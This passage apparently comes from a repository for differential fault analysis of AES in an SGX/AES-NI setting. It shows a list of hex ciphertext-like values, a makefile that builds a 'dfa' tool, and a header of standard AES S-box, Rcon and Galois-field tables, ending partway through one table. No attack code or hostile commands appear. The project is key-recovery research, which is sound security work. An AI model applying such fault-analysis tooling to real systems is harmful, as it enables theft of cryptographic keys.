286 | e5d81d8e957b1914576b592bc008ca8e
287 | 7c44f9ed5ecddba671e3cfe087d73688
288 | d4f856fc12c71fe3af0c7dee38b325b0
289 | e13ca46616e826d348ed0303b0a693ba
290 | 181af063a3407ca9212e54c4e68239e8
291 | 7148f887e9de370c6024cf1264acee4a
292 | 184712904e149daedd0a905d6cc89cb5
293 | e56a35a259a79b7675e5ff6daf8fa42d
294 | 9b65cd6c98deca79c015ab3c49758788
295 | e43477096e64202e52eb3ff529c7929f
296 | f19d26328f0f232d68b97d25033d70c9
297 | d2d4a3efd11e46f743c02e0637c9d478
298 | 3119238f03b6c9adc5781f4e0196fcb1
299 | 4264d6bf079e6871f514dc3ba83d4e56
300 | 9133da094a54449e0bbf457238da7a58
301 | 20061baa315a73dece73478e3abcb410
302 | 6221065facb51cf54bb540eba2e76d0c
303 | 6b2277f76e34549aa1e3d76795e82cd2
304 | 8d200fb2923faa0897aa8cdf3845fbde
305 | 5523af7861a4dc24ebb43ce436880b55
306 | c6d48f83d14898154f34054640353b0d
307 | 6918f2cc56b86e6d551bbc12f3caffa8
308 | 28eb5db9c1dd5d6722a466609b5d4542
309 | 0cb3860b793cf4b6b1545886ccbdde69
310 | cae9e32bea30a614a6f62abbacece8a1
311 | 26c84ff8dfe620aae505293e79274378
312 | 2be863d42d7baeb1ad84ed902044c62c
313 | 043f44298ab839b6b5e80d25fef4a568
314 | a9df9a1e7fde289d9b71a2c661f3024c
315 | 000102030405060708090a0b0c0d0e0f
316 | a8c9273507403989105b998d776e689d
317 | dec0e2667e3a3f099f4f7d32247ce0a9
318 | 21813e0e13afc3a8ecdd76a03d24b0cb
319 | 624ab6ca4a9372050bba012fe01c59b0
320 | 94a502d400d1d8aeb79fb2291a3281b1
321 | ae33967c8c8d510c9da1d5244b105e25
322 | 2cc05b4c443ef687006577b31a114305
323 | bdeee9bb838bd1623828eacaa697d072
324 | 2a1c5562fcffa9af024c017e300de327
325 | 7b1659a30e306789e489b19a7ed55949
326 | 90289da4aeff56e799ef9847e5f9f52d
327 | ff1d1f174f9e2a88475a02c305fbbb82
328 | 3b3d857ef5ae5aec934e1c67a05818bb
329 | 2f2a0b616f50d66c4bd815745ccec16d
330 | 3963fff7fde722f40852f73db7d01434
331 | 2a0e3da8cbcb249d88e267c0fbaf2a08
332 | bca3097afcd7031ca529fcdd1df1ca92
333 | 5ef6c8216bf2bba6476894d82ca23c83
334 | 24930e1e35570d778d385ac54c76a397
335 | b0a7da8c47e96ea8d34c8a450fdc2e6c
336 | 6437964ec8f05806a0e5aa04b322673c
337 | ee467309863fa0118edea3325931a38b
338 | cefca51fbf189949ad97ae7fdcf6c620
339 | 6275908918a8c56e106c79f0a45e9920
340 | 3505ded93c7f329ffe7e83a52b03c8fa
341 | 7c49f4a683f454d09d88ecea6a31854a
342 | 397ebabedb51fe245c922e879601110f
343 | 6ce7457c6d0c58788d6c488869023919
344 | 3a4f72f277abb5b6d30a2002586a76f3
345 | df4b80ac0df614c55ed2a2a3058a37e9
346 | 463b2466162638007fc33021eae498aa
347 | 45df38582aceeda0b471326633ab0d5c
348 | 0c705043a814f29790ee975284d89927
349 | f493ad16e71c82edfe8b5297826ab8e5
350 | 8bd695eed47a374eeab58b6c8ced6384
351 | b4238cfa1c9e3eccc509f67e7ac2f83a
352 | 30c411022b6060464c176e8d00498bb4
353 | 3066c313aec29ee64c76d47c15b80a32
354 | a6b87a98df7906aec0da03709284feb1
355 | 246461a2def943c807e2143cea89ea1a
356 | 07a40898f9be5960cd5b158c73caf3f6
357 | 65ed4eb1aed6c28bc13a86797fdd1247
358 | 8a0b65ad0f421f3d42d3df0fcb8ed477
359 | f32df504d2e35e110727071d95023690
360 | d047528576f00118357b3ec8aceb525d
361 | 7fb5c4e31302f6558c812085c651694b
362 | 15682dfb72522cdeded23a551830daa0
363 | eaa44cae260aff954dc0cb1414f1aad7
364 | 421668a5ba2053584d8dc9deef6838db
365 | 5679d2bc06e6ca8f16da00a34d3b4f1c
366 | fced57a2167ce46a7aa6ccd603bf60b2
367 | 0b6f5a4b19494046e23c7db36f9a656e
368 | 9ae1951b850dba546ea2ba328f05a110
369 | 18ce2b8d4a0cb8215ef88b9bdda2941d
370 | b0ece0bfc76762e42544a7a99cb30047
371 | a9978e88f340a93fe4c8cc771d185921
372 | 24a3ea942e68f52c6e98e38a58708090
373 | d49f9569554704e1eda7c75c1be4e6da
374 | bb2d97d7434d3185b6b1726d523864d2
375 | 97f5b51e76cde2ecef2e555efda0ad0a
376 | 42fbb277792cbb7f547379aa9f194b27
377 | 73b540e592422aa2d0d901062fd1ce86
378 | 0ae82a067e7e4e72ecb262fa3a51793b
379 | e031f6b177c79858d65c2ed65b8fb780
380 | 6599a1c00934357773249a3f8910218b
381 | 6b9b6f5ef2d640391c6f0c123ce3e134
382 | 327ac6bd3c5391c48716b0d425738d73
383 | 6485fc4e462795fec58f499d59cb966e
384 | d500e846a17ee25c816c73149442cb77
385 | bbd0bc69d12f5feb8d6e658947759fe4
386 | ebae7e004d901f38f128e51041b15a88
387 | dcd9dfcafb5b319305e3cadd322dca9f
388 | 0020ddca39c7744411c4c7cb2af5acbe
389 | 1001aeebccf7608d47a5b1c2618277f5
390 | c8699424ba4f31693f62662ef154533a
391 | 36b2786401a17d2b8aea7c8fc2f6a255
392 | fe360a7bd07833f38daaed0823ef489a
393 | b95aaccdd52c29e2ac511cf8b72110b5
394 | e446c25321db119081606f535589545e
395 | 0a2d4b6e9450b3c40ae63dfab365dc44
396 | 6375cb4cedba36ad0d8110b52678829e
397 | bf8d8cc763d06bf6a4b2d46f7c854d43
398 | 11bfd74f64f9a1715697fc2d76f266b9
399 | a0ff8250db81b11aa05fcb480a778d18
400 | 27095099ba3ae45c94ea353db7d42704
401 | 756e9675ba05add65be65b9dfa9e5f60
402 | 054902e5382435a431a7dfbc66e16f5b
403 | ed36bcddf53994a4ea7e73a79a4a6c37
404 | 4dc837a7ba09d7c60ab54ca739dd056c
405 | e223c4fb60ef63e59460c724b93f2b3d
406 | 5e5b161332841068e84e9dcf7dafd5ee
407 | 7feb1610a6975fdc9dc6c0ff4bd0181f
408 | a8d43b923fa6435bb59fe3eaa85a5a2e
409 | d038947ebd2cdc9bc0b82fa93e4e83e9
410 | 8f5e695ba71b42529bc584a34e4b8abc
411 | 20e6404718c8a023b4abe5313f9ba5bf
412 | be5e0b132f4c7f6aaf1701cee3b216e2
413 | a908744ed656f8b1c494c0df2d2da949
414 | cea0a202ac2fb28a8107061a03bb9b16
415 | a3107926bef319305732929d726afe79
416 | 4f69037eeceb9d8807560a2aad5923a0
417 | 7aaa38dd264ecfbf14cf7094dfadef09
418 | 2bd0c44f479f9c9b380269a7cebb51f8
419 | 9975166df3202f1a535a039b2023f014
420 | f965ce94c03a2d1673b70885a204a45e
421 | 9c49f6a8df07864a533d6bfc1efef311
422 | e9ae98973b9c0a7825d8ec6c8a117926
423 | 371fa97a0ed66249c37c6c724d6e84f6
424 | 01f47232e32bca2a64e708a01f9f6e1f
425 | 66fcf36c0439716eefda9ada0950e1e0
426 | 22bfa14327bd4f1306c9d84ad0b66de7
427 | eb384b9efd2636f86ffec5255ed91ca3
428 | 941e4685c244903631268369392004e5
429 | a0a1c6b1fc732101d6849bf0a7434ce9
430 | 1d9834081f405bee3035f914835adbce
431 | f58160868f8aa4a3be187f7bf93c0d25
432 | a9c3e6411de309aeb961cf09e21f2bcc
433 | 9094607b7b0849877931a8ee86cb07eb
434 | 2d4159795157aa88624001b6b4a9d3ad
435 | 3e08026919b45c4fa7436efabf8cfd55
436 | ab1195aa960a3e29ea34c23d9c97c9d5
437 | 5ad70f35a0caf277252c3a7c181d9159
438 | 91e23f88f517a271b639aa3e70985bff
439 | 377e8cd94b438494036aa78faaa82641
440 | ebbcd163d8335d11a54f7576b5ca9a99
441 | 5983ce288c5be5bb024cf2adeb7d4544
442 | 1d0026fff199749e689f4bd70f769b00
443 | 55ca89b9567925dc626746272d81da5e
444 | de1ede0759302a2f3b86e9470220d613
445 | c4edcc5840bea6ddff51e77ac2bc6c0b
446 | db9e6d14e13ee787db29d5d948b17d75
447 | 1bd513f5b15df49c31099aa0bfac2aab
448 | d066ea689159240fb832713be64ab288
449 | e53592572ef9806f27a7f3bf7e26d618
450 | 04abcc555b1716a8e2def0040e2f5fa6
451 | db289c35e62c22e9a90fd7a7fa4e0d33
452 | 61dd18f29326967c2e9492c755920423
453 | 442876881cb80592596f515963598184
454 | 0c078de3522f6c4bf342ec9ef3d8f312
455 | 11a8502be587cda11434e432c4e316e9
456 | bee466ad1d6606f68c18f225afda12b3
457 | 45a311817e0fdb642275c8ddd0dd8fd9
458 | 9e5606ea6869841803db8a2427f3e966
459 | 893ebc4451d6ce66c2ac7bb0b4eae497
460 | b6776e18db4482d3893a0bf218c3ee0f
461 | 4c8bf25815bc5211fdbbb0556a134235
462 | 02cff00ab664e99b78772149114977ee
463 | 2b44d1eddd82e3d0658edabee30dee1b
464 | 141ed72383a62756f51bbad3e3eed443
465 | 41fbfb5c3fd6f86658423b6c70d97226
466 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/analysis/makefile:
--------------------------------------------------------------------------------
1 | main:
2 | 	g++ -std=c++11 -Wall -fopenmp -O3 -march=native -o dfa dfa.cpp
3 | 	cp dfa ../examples
4 | 
5 | clean:
6 | 	rm -f dfa
7 | 	rm -f ../examples/dfa
8 | 
9 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/analysis/tables.hpp:
--------------------------------------------------------------------------------
  1 | //
  2 | // Licensed by "The MIT License". See file LICENSE.
  3 | //
  4 | 
  5 | #ifndef TABLES_H
  6 | #define TABLES_H
  7 | 
  8 | using std::uint8_t;
  9 | 
 10 | /* AES SBox */
 11 | const uint8_t sbox[256] =
 12 | {
 13 |   0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
 14 |   0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
 15 |   0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
 16 |   0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
 17 |   0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
 18 |   0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
 19 |   0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
 20 |   0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
 21 |   0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
 22 |   0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
 23 |   0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
 24 |   0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
 25 |   0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
 26 |   0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
 27 |   0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
 28 |   0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16
 29 | };
 30 | 
 31 | /* Inverse AES SBox */
 32 | const uint8_t isbox[256] =
 33 | {
 34 |   0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB,
 35 |   0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB,
 36 |   0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E,
 37 |   0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25,
 38 |   0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92,
 39 |   0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84,
 40 |   0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06,
 41 |   0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B,
 42 |   0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73,
 43 |   0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E,
 44 |   0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B,
 45 |   0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4,
 46 |   0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F,
 47 |   0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF,
 48 |   0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61,
 49 |   0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D
 50 | };
 51 | 
 52 | /* Rijndael Rcon */
 53 | const uint8_t rcon[255] =
 54 | {
 55 |   0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,
 56 |   0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,
 57 |   0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,
 58 |   0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
 59 |   0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,
 60 |   0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,
 61 |   0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,
 62 |   0x36, 0x6c, 0xd8, 0xab, 0x4D, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,
 63 |   0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,
 64 |   0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
 65 |   0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,
 66 |   0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,
 67 |   0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,
 68 |   0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,
 69 |   0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,
 70 |   0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb
 71 | };
 72 | 
 73 | /* Galois Multiplication Tables */
 74 | const uint8_t gm_01[256] =
 75 | {
 76 |   0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f,
 77 |   0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f,
 78 |   0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f,
 79 |   0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f,
 80 |   0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f,
 81 |   0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5a, 0x5b, 0x5c, 0x5d, 0x5e, 0x5f,
 82 |   0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f,
 83 |   0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7a, 0x7b, 0x7c, 0x7d, 0x7e, 0x7f,
 84 |   0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x8d, 0x8e, 0x8f,
 85 |   0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f,
 86 |   0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, 0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf,
 87 |   0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba, 0xbb, 0xbc, 0xbd, 0xbe, 0xbf,
 88 |   0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, 0xc8, 0xc9, 0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf,
 89 |   0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, 0xd8, 0xd9, 0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf,
 90 |   0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, 0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef,
 91 |   0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff
 92 | };
 93 | 
 94 | const uint8_t gm_09[256] =
 95 | {
 96 |   0x00, 0x09, 0x12, 0x1b, 0x24, 0x2d, 0x36, 0x3f, 0x48, 0x41, 0x5a, 0x53, 0x6c, 0x65, 0x7e, 0x77,
 97 |   0x90, 0x99, 0x82, 0x8b, 0xb4, 0xbd, 0xa6, 0xaf, 0xd8, 0xd1, 0xca, 0xc3, 0xfc, 0xf5, 0xee, 0xe7,
 98 |   0x3b, 0x32, 0x29, 0x20, 0x1f, 0x16, 0x0d, 0x04, 0x73, 0x7a, 0x61, 0x68, 0x57, 0x5e, 0x45, 0x4c,
 99 |   0xab, 0xa2, 0xb9, 0xb0, 0x8f, 0x86, 0x9d, 0x94, 0xe3, 0xea, 0xf1, 0xf8, 0xc7, 0xce, 0xd5, 0xdc,
100 |   0x76, 0x7f, 0x64, 0x6d, 0x52, 0x5b, 0x40, 0x49, 0x3e, 0x37, 0x2c, 0x25, 0x1a, 0x13, 0x08, 0x01,
101 |   0xe6, 0xef, 0xf4, 0xfd, 0xc2, 0xcb, 0xd0, 0xd9, 0xae, 0xa7, 0xbc, 0xb5, 0x8a, 0x83, 0x98, 0x91,
102 |   0x4d, 0x44, 0x5f, 0x56, 0x69, 0x60, 0x7b, 0x72, 0x05, 0x0c, 0x17, 0x1e, 0x21, 0x28, 0x33, 0x3a,
103 |   0xdd, 0xd4, 0xcf, 0xc6, 0xf9, 0xf0, 0xeb, 0xe2, 0x95, 0x9c, 0x87, 0x8e, 0xb1, 0xb8, 0xa3, 0xaa,
104 |   0xec, 0xe5, 0xfe, 0xf7, 0xc8, 0xc1, 0xda, 0xd3, 0xa4, 0xad, 0xb6, 0xbf, 0x80, 0x89, 0x92, 0x9b,
105 |   0x7c, 0x75, 0x6e, 0x67, 0x58, 0x51, 0x4a, 0x43, 0x34, 0x3d, 0x26, 0x2f, 0x10, 0x19, 0x02, 0x0b,
106 |   0xd7, 0xde, 0xc5, 0xcc, 0xf3, 0xfa, 0xe1, 0xe8, 0x9f, 0x96, 0x8d, 0x84, 0xbb, 0xb2, 0xa9, 0xa0,
107 |   0x47, 0x4e, 0x55, 0x5c, 0x63, 0x6a, 0x71, 0x78, 0x0f, 0x06, 0x1d, 0x14, 0x2b, 0x22, 0x39, 0x30,
108 |   0x9a, 0x93, 0x88, 0x81, 0xbe, 0xb7, 0xac, 0xa5, 0xd2, 0xdb, 0xc0, 0xc9, 0xf6, 0xff, 0xe4, 0xed,
109 |   0x0a, 0x03, 0x18, 0x11, 0x2e, 0x27, 0x3c, 0x35, 0x42, 0x4b, 0x50, 0x59, 0x66, 0x6f, 0x74, 0x7d,
110 |   0xa1, 0xa8, 0xb3, 0xba, 0x85, 0x8c, 0x97, 0x9e, 0xe9, 0xe0, 0xfb, 0xf2, 0xcd, 0xc4, 0xdf, 0xd6,
111 |   0x31, 0x38, 0x23, 0x2a, 0x15, 0x1c, 0x07, 0x0e, 0x79, 0x70, 0x6b, 0x62, 0x5d, 0x54, 0x4f, 0x46
112 | };
113 | 
114 | const uint8_t gm_0b[256] =
115 | {
116 |   0x00, 0x0b, 0x16, 0x1d, 0x2c, 0x27, 0x3a, 0x31, 0x58, 0x53, 0x4e, 0x45, 0x74, 0x7f, 0x62, 0x69,
117 |   0xb0, 0xbb, 0xa6, 0xad, 0x9c, 0x97, 0x8a, 0x81, 0xe8, 0xe3, 0xfe, 0xf5, 0xc4, 0xcf, 0xd2, 0xd9,
118 |   0x7b, 0x70, 0x6d, 0x66, 0x57, 0x5c, 0x41, 0x4a, 0x23, 0x28, 0x35, 0x3e, 0x0f, 0x04, 0x19, 0x12,
119 |   0xcb, 0xc0, 0xdd, 0xd6, 0xe7, 0xec, 0xf1, 0xfa, 0x93, 0x98, 0x85, 0x8e, 0xbf, 0xb4, 0xa9, 0xa2,
120 |   0xf6, 0xfd, 0xe0, 0xeb, 0xda, 0xd1, 0xcc, 0xc7, 0xae, 0xa5, 0xb8, 0xb3, 0x82, 0x89, 0x94, 0x9f,
121 |   0x46, 0x4d, 0x50, 0x5b, 0x6a, 0x61, 0x7c, 0x77, 0x1e, 0x15, 0x08, 0x03, 0x32, 0x39, 0x24, 0x2f,
122 |   0x8d, 0x86, 0x9b, 0x90, 0xa1, 0xaa, 0xb7, 0xbc, 0xd5, 0xde, 0xc3, 0xc8, 0xf9, 0xf2, 0xef, 0xe4,
123 |   0x3d, 0x36, 0x2b, 0x20, 0x11, 0x1a, 0x07, 0x0c, 0x65, 0x6e, 0x73, 0x78, 0x49, 0x42, 0x5f, 0x54,
124 |   0xf7, 0xfc, 0xe1, 0xea, 0xdb, 0xd0, 0xcd, 0xc6, 0xaf, 0xa4, 0xb9, 0xb2, 0x83, 0x88, 0x95, 0x9e,
125 |   0x47, 0x4c, 0x51, 0x5a, 0x6b, 0x60, 0x7d, 0x76, 0x1f, 0x14, 0x09, 0x02, 0x33, 0x38, 0x25, 0x2e,
126 |   0x8c, 0x87, 0x9a, 0x91, 0xa0, 0xab, 0xb6, 0xbd, 0xd4, 0xdf, 0xc2, 0xc9, 0xf8, 0xf3, 0xee, 0xe5,
127 |   0x3c, 0x37, 0x2a, 0x21, 0x10, 0x1b, 0x06, 0x0d, 0x64, 0x6f, 0x72, 0x79, 0x48, 0x43, 0x5e, 0x55,
128 |   0x01, 0x0a, 0x17, 0x1c, 0x2d, 0x26, 0x3b, 0x30, 0x59, 0x52, 0x4f, 0x44, 0x75, 0x7e, 0x63, 0x68,
129 |   0xb1, 0xba, 0xa7, 0xac, 0x9d, 0x96, 0x8b, 0x80, 0xe9, 0xe2, 0xff, 0xf4, 0xc5, 0xce, 0xd3, 0xd8,
130 |   0x7a, 0x71, 0x6c, 0x67, 0x56, 0x5d, 0x40, 0x4b, 0x22, 0x29, 0x34, 0x3f, 0x0e, 0x05, 0x18, 0x13,
131 |   0xca, 0xc1, 0xdc, 0xd7, 0xe6, 0xed, 0xf0, 0xfb, 0x92, 0x99, 0x84, 0x8f, 0xbe, 0xb5, 0xa8, 0xa3
132 | };
133 | 
134 | const uint8_t gm_0d[256] =
135 | {
136 |   0x00, 0x0d, 0x1a, 0x17, 0x34, 0x39, 0x2e, 0x23, 0x68, 0x65, 0x72, 0x7f, 0x5c, 0x51, 0x46, 0x4b,
137 |   0xd0, 0xdd, 0xca, 0xc7, 0xe4, 0xe9, 0xfe, 0xf3, 0xb8, 0xb5, 0xa2, 0xaf, 0x8c, 0x81, 0x96, 0x9b,
138 |   0xbb, 0xb6, 0xa1, 0xac, 0x8f, 0x82, 0x95, 0x98, 0xd3, 0xde, 0xc9, 0xc4, 0xe7, 0xea, 0xfd, 0xf0,
139 |   0x6b, 0x66, 0x71, 0x7c, 0x5f, 0x52, 0x45, 0x48, 0x03, 0x0e, 0x19, 0x14, 0x37, 0x3a, 0x2d, 0x20,
140 |   0x6d, 0x60, 0x77, 0x7a, 0x59, 0x54, 0x43, 0x4e, 0x05, 0x08, 0x1f, 0x12, 0x31, 0x3c, 0x2b, 0x26,
141 |   0xbd, 0xb0, 0xa7, 0xaa, 0x89, 0x84, 0x93, 0x9e, 0xd5, 0xd8, 0xcf, 0xc2, 0xe1, 0xec, 0xfb, 0xf6,
142 |   0xd6, 0xdb, 0xcc, 0xc1, 0xe2, 0xef, 0xf8, 0xf5, 0xbe, 0xb3, 0xa4, 0xa9, 0x8a, 0x87, 0x90, 0x9d,
143 |   0x06, 0x0b, 0x1c, 0x11, 0x32, 0x3f, 0x28, 0x25, 0x6e, 0x63, 0x74, 0x79, 0x5a, 0x57, 0x40, 0x4d,
